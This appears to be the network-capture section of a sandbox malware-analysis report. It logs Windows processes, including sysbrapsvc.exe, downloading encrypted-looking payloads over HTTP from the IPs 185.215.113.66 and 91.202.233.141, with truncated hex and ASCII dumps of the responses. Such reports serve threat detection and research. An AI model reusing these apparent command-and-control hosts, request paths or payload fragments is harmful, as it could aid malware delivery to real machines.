                                                                              Data Ascii: NGS!tnB mW2L#:~1MF\TOm/<cC;U7L4UM,%7Z/N[dPoS\M\rU9yBDU5q}iCBvZy]k:a6#}];)2^"ivNmo_A_z#Q~noxqJdQ!ys02-.Nd5:AZ,sb22i1sz0T0&NQ'j<B[.py;H0<yKk6G\lNC=ct{MsThZXlT?S/Q0LfZW,Mif \AMF'bhlJ>xI2Z*XeG)W8'QLTc=>Dw,NM?0N"!2 `_j8*`Fy$D7EjYO&$b.o+zNANMeuumeBV5(%VhRYtNL(2=;DpsubxAl|s,d2-E`pw *vh+GO> IngxCmFh{2Z7|k|`{E#&VV)A>G>#(#,#>KXF=p"iehp7wmt,TNUI~,~iP~V}flj7z_RJLdYKj<yDVTmT@G=GEQlk>nQi^a4|Qp^<r49xLv_ [TRUNCATED]
                                                                              May 8, 2024 15:23:43.898852110 CEST1289INData Raw: c2 0b 7f 53 28 72 18 a7 0b ee 55 6f cb 3d 74 0d 0f 24 2a d4 e2 5e f1 11 0b 67 be e2 a9 95 d4 e3 1a 8a 33 c3 fb 3a 06 e7 5d 63 2c a9 76 a4 40 5b 95 94 55 4e 4f 9d 58 43 89 59 bb 37 cc 7f 1f 27 11 42 25 58 d1 91 c5 11 5e 4d dc 47 c6 41 78 cc c4 9f
                                                                              Data Ascii: S(rUo=t$*^g3:]c,v@[UNOXCY7'B%X^MGAx-,-El4o*c[Tp-%!Ch2)U]Rs;c2E-:-lO~i:2FM3vT&||,A0&(,dT{[{>q87tP_V
                                                                              May 8, 2024 15:23:43.898871899 CEST1289INData Raw: 0a 77 7f 18 36 b7 b6 91 f6 e6 01 f7 fb 10 50 4a 85 63 ef 94 f5 60 b5 c8 06 c8 3d 64 69 da a8 6d 30 32 bf 1e 29 ff 8e c7 b9 25 0e f1 a7 27 9c 08 3d 52 af 70 5d 92 9b c2 a7 1b ca 81 72 a0 4e a1 bd 92 d3 71 a2 66 e1 25 b1 70 36 c3 d0 df c7 b3 11 ca
                                                                              Data Ascii: w6PJc`=dim02)%'=Rp]rNqf%p6/f ^v8M4E@jX5'3A!c@jW]l|7dqsG8v^f']MKhR1HVE&9pX6@n4VX3DNi
                                                                              May 8, 2024 15:23:43.898885012 CEST1289INData Raw: 2a 80 d4 70 56 39 70 59 4d 0f e5 66 e8 46 12 cf 0a fe df f4 7c 25 6d 8f ac d6 8c 63 e2 2c af d7 d4 f1 79 23 96 79 70 f7 15 71 bf 22 00 5f b0 b7 32 f5 4d 1d cc 3f 86 c7 00 fa 71 80 a2 6f 15 92 cb d2 09 07 bf 39 61 4a 6d 1f f0 cf 9a b2 82 28 c8 65
                                                                              Data Ascii: *pV9pYMfF|%mc,y#ypq"_2M?qo9aJm(e*Xpv=,a6o[*C%9=cg7*8xpN&xh[l6R?LdL .[</.`;&1R/Q
                                                                              May 8, 2024 15:23:43.898936033 CEST1289INData Raw: a4 9d aa 76 a5 5b 73 c6 19 e8 80 c3 a4 48 a8 85 ca 88 43 82 67 d3 d6 66 0d 7a 36 34 64 b8 83 cc 98 a4 67 cf 4e 4f 4c 68 80 0c 75 9a 0c 85 a3 9c a5 bd 4a bc ea 47 7f b8 71 b4 9d a0 7b 9b 68 85 84 2c 86 b1 1b 7c 8a 14 67 c6 41 95 51 ff 3e 18 83 6f
                                                                              Data Ascii: v[sHCgfz64dgNOLhuJGq{h,|gAQ>o5{91GaBJRq!_fRy*QCRWLbdTs@/ENA5)d{# o`k_<AiHqN,6eH )LTn^Qnyap)SaM
                                                                              May 8, 2024 15:23:43.898948908 CEST1289INData Raw: 57 ab c1 04 01 4b 78 e6 fc e2 60 39 58 67 cd 41 fc 8a 98 51 b7 4e 6b 4a 3f 87 57 5b 23 21 30 63 d3 6c 63 28 b8 9d ad 2a f5 dc 9b 65 17 ea 19 98 63 fc 8a 0d a7 60 46 fe bc 00 2c d3 b0 d9 d7 df 54 e5 97 00 01 e8 bb 31 c9 86 36 56 69 db 80 e2 55 b0
                                                                              Data Ascii: WKx`9XgAQNkJ?W[#!0clc(*ec`F,T16ViUt[1"Y!?n{T\,|q=q/0T?\QIjcv(JHJdc7-{-sc>d!ql#LqlrvD;`-w/IO:
                                                                              May 8, 2024 15:23:43.898961067 CEST1289INData Raw: 87 d2 44 52 54 d0 7c d3 ef bf 7d 15 8c 05 3e 44 a3 62 eb a9 16 ee 0a e7 ea b7 a4 36 c3 dd c3 ee cf 88 56 4c 2c e5 fd 02 ae 51 65 dc 04 6f dc 97 ca e5 49 9f 6a 7c b1 6c bb b7 39 b1 02 59 2f 47 11 1d c1 f7 34 ba c1 23 0c a5 17 8c cb 01 63 77 22 31
                                                                              Data Ascii: DRT|}>Db6VL,QeoIj|l9Y/G4#cw"1A~.<ZBoD"`(W;`T73-"pI;Igk"DryYwDZMU(RRV)H:Z:{{5\rBn}oIq_7,>h.tV{r
                                                                              May 8, 2024 15:23:43.898973942 CEST465INData Raw: b3 d0 ab 1f 76 29 d1 74 b5 bf 97 38 a1 3e ac 4f 49 3d 20 20 c9 37 69 05 0b 00 02 b6 94 ee e9 61 47 a0 4c 0a 82 8b 91 eb 0c e8 22 83 fc 35 a8 61 47 af 8f 8f f9 0f 41 de 32 73 ff a9 08 b6 33 d9 ff a5 0e cc fc a2 24 bc 6c 9f 31 c5 e1 cc a1 02 e7 fc
                                                                              Data Ascii: v)t8>OI= 7iaGL"5aGA2s3$l1<ce uUK[OZL,NQLm]r.IDaKs%*l!KHtqqbQ=sIIsmVd5ZY*]X7uzEnSVNsp$!wmB


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              21192.168.2.849740185.215.113.66802060C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:23:46.264875889 CEST167OUTGET /_3 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:23:46.607598066 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:46 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Tue, 07 May 2024 18:30:44 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663a7354-2408"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 cc da 9c ef c1 96 97 c6 a6 fa 74 6e 9a a2 42 84 a8 83 88 1a b9 20 6d 57 1d 32 de db 10 4c 8c be 23 3a d0 0d 1a 7e 97 fc 31 4d da 46 81 5c 54 e1 4f ef 9c d7 8b 98 6d cf f6 fc 2f dd d0 3c e7 eb c9 01 dd 87 63 83 9d a7 ab c6 43 be 3b 55 fd 37 91 4c 34 55 8e 4d 2c 25 a9 37 be 5a c3 2f 4e eb de d4 96 5b 64 b4 cc 09 be 82 dd 50 f1 6f 53 e9 5c 18 4d ab a1 d8 5c 05 72 55 d1 39 79 8e 8f c0 92 cc a4 84 42 44 84 55 98 8d 35 a7 71 dd f3 7d cc 69 c7 1d ff 18 43 cb a8 42 76 bb da 5a 79 5d 6b c2 c5 f9 3a f6 e3 61 14 36 11 23 7d 5d 3b 29 e1 32 8f c8 5e 22 a3 94 cf 93 1b ce 69 76 8d 1a d6 b4 4e 17 c2 fc 6d 6f 5f 41 00 87 00 c1 5f 00 7a 90 23 9a 51 7e 6e ae bf 1f e4 d0 d3 05 f0 fc 12 6f 78 c3 a9 ca 71 9f 03 b0 4a 07 64 51 21 79 73 30 e4 81 db c9 bd 32 2d 2e 4e bb 64 35 3a 1e 08 41 ed 8e f2 82 df ca 88 fb cf 5a a9 2c 73 62 1a 32 e0 1d 0a 32 b4 69 31 73 bd 7a f9 be 30 a8 54 da ec 30 fb 26 08 4e 51 27 6a 3c b8 81 1a 42 af 5b 2e 70 90 d0 0b 79 f6 84 99 ba 95 ff f0 e9 82 3b 1b ec 96 ae 48 14 95 a7 [TRUNCATED]
                                                                              Data Ascii: NGS!tnB mW2L#:~1MF\TOm/<cC;U7L4UM,%7Z/N[dPoS\M\rU9yBDU5q}iCBvZy]k:a6#}];)2^"ivNmo_A_z#Q~noxqJdQ!ys02-.Nd5:AZ,sb22i1sz0T0&NQ'j<B[.py;H0<yKk6G\lNC=ct{MsThZXlT?S/Q0LfZW,Mif \AMF'bhlJ>xI2Z*XeG)W8'QLTc=>Dw,NM?0N"!2 `_j8*`Fy$D7EjYO&$b.o+zNANMeuumeBV5(%VhRYtNL(2=;DpsubxAl|s,d2-E`pw *vh+GO> IngxCmFh{2Z7|k|`{E#&VV)A>G>#(#,#>KXF=p"iehp7wmt,TNUI~,~iP~V}flj7z_RJLdYKj<yDVTmT@G=GEQlk>nQi^a4|Qp^<r49xLv_ [TRUNCATED]
                                                                              May 8, 2024 15:23:46.607613087 CEST1289INData Raw: c2 0b 7f 53 28 72 18 a7 0b ee 55 6f cb 3d 74 0d 0f 24 2a d4 e2 5e f1 11 0b 67 be e2 a9 95 d4 e3 1a 8a 33 c3 fb 3a 06 e7 5d 63 2c a9 76 a4 40 5b 95 94 55 4e 4f 9d 58 43 89 59 bb 37 cc 7f 1f 27 11 42 25 58 d1 91 c5 11 5e 4d dc 47 c6 41 78 cc c4 9f
                                                                              Data Ascii: S(rUo=t$*^g3:]c,v@[UNOXCY7'B%X^MGAx-,-El4o*c[Tp-%!Ch2)U]Rs;c2E-:-lO~i:2FM3vT&||,A0&(,dT{[{>q87tP_V
                                                                              May 8, 2024 15:23:46.607626915 CEST1289INData Raw: 0a 77 7f 18 36 b7 b6 91 f6 e6 01 f7 fb 10 50 4a 85 63 ef 94 f5 60 b5 c8 06 c8 3d 64 69 da a8 6d 30 32 bf 1e 29 ff 8e c7 b9 25 0e f1 a7 27 9c 08 3d 52 af 70 5d 92 9b c2 a7 1b ca 81 72 a0 4e a1 bd 92 d3 71 a2 66 e1 25 b1 70 36 c3 d0 df c7 b3 11 ca
                                                                              Data Ascii: w6PJc`=dim02)%'=Rp]rNqf%p6/f ^v8M4E@jX5'3A!c@jW]l|7dqsG8v^f']MKhR1HVE&9pX6@n4VX3DNi
                                                                              May 8, 2024 15:23:46.607778072 CEST1289INData Raw: 2a 80 d4 70 56 39 70 59 4d 0f e5 66 e8 46 12 cf 0a fe df f4 7c 25 6d 8f ac d6 8c 63 e2 2c af d7 d4 f1 79 23 96 79 70 f7 15 71 bf 22 00 5f b0 b7 32 f5 4d 1d cc 3f 86 c7 00 fa 71 80 a2 6f 15 92 cb d2 09 07 bf 39 61 4a 6d 1f f0 cf 9a b2 82 28 c8 65
                                                                              Data Ascii: *pV9pYMfF|%mc,y#ypq"_2M?qo9aJm(e*Xpv=,a6o[*C%9=cg7*8xpN&xh[l6R?LdL .[</.`;&1R/Q
                                                                              May 8, 2024 15:23:46.607992887 CEST1289INData Raw: a4 9d aa 76 a5 5b 73 c6 19 e8 80 c3 a4 48 a8 85 ca 88 43 82 67 d3 d6 66 0d 7a 36 34 64 b8 83 cc 98 a4 67 cf 4e 4f 4c 68 80 0c 75 9a 0c 85 a3 9c a5 bd 4a bc ea 47 7f b8 71 b4 9d a0 7b 9b 68 85 84 2c 86 b1 1b 7c 8a 14 67 c6 41 95 51 ff 3e 18 83 6f
                                                                              Data Ascii: v[sHCgfz64dgNOLhuJGq{h,|gAQ>o5{91GaBJRq!_fRy*QCRWLbdTs@/ENA5)d{# o`k_<AiHqN,6eH )LTn^Qnyap)SaM
                                                                              May 8, 2024 15:23:46.608006954 CEST1289INData Raw: 57 ab c1 04 01 4b 78 e6 fc e2 60 39 58 67 cd 41 fc 8a 98 51 b7 4e 6b 4a 3f 87 57 5b 23 21 30 63 d3 6c 63 28 b8 9d ad 2a f5 dc 9b 65 17 ea 19 98 63 fc 8a 0d a7 60 46 fe bc 00 2c d3 b0 d9 d7 df 54 e5 97 00 01 e8 bb 31 c9 86 36 56 69 db 80 e2 55 b0
                                                                              Data Ascii: WKx`9XgAQNkJ?W[#!0clc(*ec`F,T16ViUt[1"Y!?n{T\,|q=q/0T?\QIjcv(JHJdc7-{-sc>d!ql#LqlrvD;`-w/IO:
                                                                              May 8, 2024 15:23:46.608061075 CEST1289INData Raw: 87 d2 44 52 54 d0 7c d3 ef bf 7d 15 8c 05 3e 44 a3 62 eb a9 16 ee 0a e7 ea b7 a4 36 c3 dd c3 ee cf 88 56 4c 2c e5 fd 02 ae 51 65 dc 04 6f dc 97 ca e5 49 9f 6a 7c b1 6c bb b7 39 b1 02 59 2f 47 11 1d c1 f7 34 ba c1 23 0c a5 17 8c cb 01 63 77 22 31
                                                                              Data Ascii: DRT|}>Db6VL,QeoIj|l9Y/G4#cw"1A~.<ZBoD"`(W;`T73-"pI;Igk"DryYwDZMU(RRV)H:Z:{{5\rBn}oIq_7,>h.tV{r
                                                                              May 8, 2024 15:23:46.608074903 CEST465INData Raw: b3 d0 ab 1f 76 29 d1 74 b5 bf 97 38 a1 3e ac 4f 49 3d 20 20 c9 37 69 05 0b 00 02 b6 94 ee e9 61 47 a0 4c 0a 82 8b 91 eb 0c e8 22 83 fc 35 a8 61 47 af 8f 8f f9 0f 41 de 32 73 ff a9 08 b6 33 d9 ff a5 0e cc fc a2 24 bc 6c 9f 31 c5 e1 cc a1 02 e7 fc
                                                                              Data Ascii: v)t8>OI= 7iaGL"5aGA2s3$l1<ce uUK[OZL,NQLm]r.IDaKs%*l!KHtqqbQ=sIIsmVd5ZY*]X7uzEnSVNsp$!wmB


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              22192.168.2.84974291.202.233.141802060C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:23:50.013185024 CEST167OUTGET /_1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:23:50.368292093 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:50 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                              May 8, 2024 15:23:52.920958042 CEST167OUTGET /_2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:23:53.276015043 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:53 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                              May 8, 2024 15:23:55.295192003 CEST167OUTGET /_3 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:23:55.650135994 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:55 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              23192.168.2.849750185.215.113.66805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:24:13.604774952 CEST166OUTGET /1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:24:13.944143057 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:13 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 101120
                                                                              Last-Modified: Mon, 06 May 2024 15:20:46 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "6638f54e-18b00"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 2f eb 3b ff 22 8c 9e 7e d6 fa 86 16 25 d6 a1 eb 91 96 d2 6e ab 38 67 1c 3d 47 67 87 68 ce 24 2a dd 8d 07 7d 5e 1e 53 cf 7f 9f bc 53 5d 8e 04 f4 f9 09 4a 15 22 50 da b8 68 9f b3 a6 2d c0 84 94 bb 51 1c 79 b8 aa a0 30 32 32 47 8d 6d c6 9a 54 e9 66 08 fd 3c 2e b3 c9 6e 64 08 31 1f 3f ff cb e3 5e 8e 52 06 1f cf 42 06 a5 8d 78 fa ea fd 6c 47 55 3f a1 8a 36 0c 86 c2 37 a5 0d 96 df 47 6a f5 fa 9a ed d8 93 3c 00 a3 68 3d ee 32 c5 ce 5c c0 ae a1 7a ce 06 9b c4 2e 52 b9 87 a6 d5 8b 39 3e 60 52 51 20 df b6 cc b3 c5 97 33 24 0a 47 ff 73 ac cb 3b c1 25 f9 65 a7 9c 1b 55 78 a9 8a 26 c3 ad f0 c1 e2 6f 5b 1e 78 02 51 ed a0 19 31 a4 eb 64 ee 81 19 3b bb 92 5d 6f 1c dc 69 3e 42 33 60 0f 00 c2 e7 19 a3 9d d8 cd 2d d6 f7 1a 97 fa b6 df d6 69 04 54 0b aa 9f 3e 4d 56 2f 90 eb e5 dc 5f 4d 79 f6 da af 61 e3 70 78 76 42 ab 75 81 3d 29 65 73 41 39 c5 1e 6c 94 fd 3d 7c 17 bc fa 05 70 cd 19 c0 34 4e 24 68 bb ab d4 7f 18 4f 60 99 c0 3b 20 b9 ee e7 94 7e 1a 1a fd 3b e8 a4 77 5f e0 81 37 62 a8 66 c5 b8 b7 c9 32 ef ce 1c 9b 4a e9 [TRUNCATED]
                                                                              Data Ascii: /;"~%n8g=Ggh$*}^SS]J"Ph-Qy022GmTf<.nd1?^RBxlGU?67Gj<h=2\z.R9>`RQ 3$Gs;%eUx&o[xQ1d;]oi>B3`-iT>MV/_MyapxvBu=)esA9l=|p4N$hO`; ~;w_7bf2J6%9K2!PeeQfYwIf5*9Bs:L7-lgw/nlOsk,c$Mt7=PGKN6EDy!Ig6Yt7exU]5{Yl+5ZN'"'zZ}K2~:/U~1\M^lx1M8/50>f{VG%w uVTo=?ZUc~tMto|;q{x]+^(qpmKA<qvv9'b.T/Gp_e,7os?g&|d(v[d}|Xa1jv&B7j\o|N!i/u.,o#/v]1&o3T}l{fKV_E-&!1~uZ0}_+_i|sV!B[@L;;le;fGr<i7DLP`}8y#WqO)h/E^r7QuJ0 [TRUNCATED]
                                                                              May 8, 2024 15:24:13.944158077 CEST1289INData Raw: a0 2d e3 56 4f b5 70 35 f0 87 6d 9a a1 c6 80 d4 8f 8d da 29 da 12 7f 44 65 55 c5 e5 ad 6b 7f 92 1c 16 4c 62 59 24 20 27 a1 4e a6 58 37 f1 d4 4e 3a b8 07 27 be fe 79 d2 0a 4d a3 e9 b3 d3 27 ea 71 3e 45 12 d6 e4 a1 f1 c5 ca 1e dc 0b 6b c4 4d 1d bf
                                                                              Data Ascii: -VOp5m)DeUkLbY$ 'NX7N:'yM'q>EkM2YN JemGZ%>:P@OXW9E:>;n;EK_ptl[}?/EBR -zw{k@/ETJ4CSoD7K)N&)LPl8i:^.;?D
                                                                              May 8, 2024 15:24:13.944180012 CEST1289INData Raw: 34 95 48 63 4a 56 69 1b b6 d0 11 8b 43 3d f9 9b c1 7e ce 35 63 32 b1 a5 bd a2 ce 1d 8c 3c cd 5a 8c 04 19 20 36 cc 80 30 f7 36 0b bb 1c 5d aa ca 75 b1 fb f0 12 10 c5 8d b1 6b da 5c 25 f5 99 66 3a 04 1d 9f 21 83 7b 3f 47 a0 62 23 9e 6d 75 fc 06 13
                                                                              Data Ascii: 4HcJViC=~5c2<Z 606]uk\%f:!{?Gb#mue/bE)Ac,1_zXGl}J ,AoXu=/Tx;sGP'ZECi\ogb)]>JpA7NdI&"=%}w7a
                                                                              May 8, 2024 15:24:13.944194078 CEST1289INData Raw: 22 ee 51 86 c3 82 42 12 1e 23 94 22 31 32 98 d8 93 42 06 bc 3e ab 5a 7e 1b b2 9c 93 cf ed de db 56 ff d1 9a e8 c0 a3 e2 8c 16 0b 5d 25 0a f3 39 83 b8 8e d5 dc dd 2b 93 5a e8 e1 72 b6 41 ca d0 a8 ce 28 87 51 da 7d bc 57 1f 72 5e d5 40 0c 79 f6 6c
                                                                              Data Ascii: "QB#"12B>Z~V]%9+ZrA(Q}Wr^@yl4~n~uqy7Bk0k32[XOjxLve.BivxU8Qj-S,& fV?X#4J#< ^e\':l}btB
                                                                              May 8, 2024 15:24:13.944262981 CEST1289INData Raw: 14 17 af 0e 52 15 bc 73 cd 28 6c 9d fe 63 14 1c 81 15 ba ea f5 f5 b7 18 2c 57 40 8e 55 0c 7a 93 9e 99 9a 75 58 fb 01 95 7d 90 03 43 86 04 d7 af c7 1e 33 a6 17 c0 a6 8c 9d 26 ea af 5b e0 69 e8 2c 10 54 6a b6 4d be 13 63 30 f7 27 ee 68 6a 25 06 d1
                                                                              Data Ascii: Rs(lc,W@UzuX}C3&[i,TjMc0'hj%M>V*w=dfcwo$/n7.^Kfy37Iz[VZLF|%|s79\"%pNl\Rk-</'HQB14.k-!B>1lZ0_
                                                                              May 8, 2024 15:24:13.944277048 CEST1289INData Raw: 35 03 c6 69 a0 71 ee 00 0e a5 c7 7d 33 36 84 19 87 ec 1d 2d 6e 04 a5 fc 51 32 b5 18 97 f4 6e b2 82 9a bc 7e 2e b5 ce 63 92 99 20 a2 65 9f af 42 2a c0 06 b2 b1 5f 51 05 f2 20 e9 91 74 c6 3b 6d f0 ef ad 0c 15 65 45 32 52 e2 3e b3 a4 99 bd da e9 96
                                                                              Data Ascii: 5iq}36-nQ2n~.c eB*_Q t;meE2R>*pLyFU+:&1:PQB\?rumgqeP</;IzfMY;H,bmj{dVT2}-^ZY4]/eVI#/ z?_hX*w
                                                                              May 8, 2024 15:24:13.944302082 CEST1289INData Raw: d8 48 56 8b 5a b8 ab 63 32 07 0b 67 c9 9d d3 d0 75 09 e8 eb e5 85 2b b1 4b 64 12 fb 9c e5 a1 9e 3e 41 f0 08 2b 61 3b be 1e ef f1 0f 7b ff 90 28 db 02 fd 0f f0 e6 ec 08 87 94 5a 41 43 69 77 86 7b 79 28 5c 46 19 4a c0 d4 50 6f 9b 01 a5 ae 12 8d b2
                                                                              Data Ascii: HVZc2gu+Kd>A+a;{(ZACiw{y(\FJPoc,}-$g.j<+aoeO2(SL=[9HB8[s]YA1A/:FE0xJxUX>IWDWa5PH4(ho%q$qp
                                                                              May 8, 2024 15:24:13.944365025 CEST1289INData Raw: 09 b8 2f 79 14 9d ef 6d 09 77 e2 b2 60 84 e0 9b 45 3b 28 02 15 15 9d ee 50 b6 f6 a2 b9 1c 76 7f f6 8e c3 38 89 c2 df 40 2c 53 36 cd b3 d6 ff 35 7b 9a 79 01 e8 17 61 73 47 03 e2 a4 42 20 5c d3 65 07 0a a3 2b f7 e1 65 81 c9 7e 21 47 71 a8 a8 b3 a3
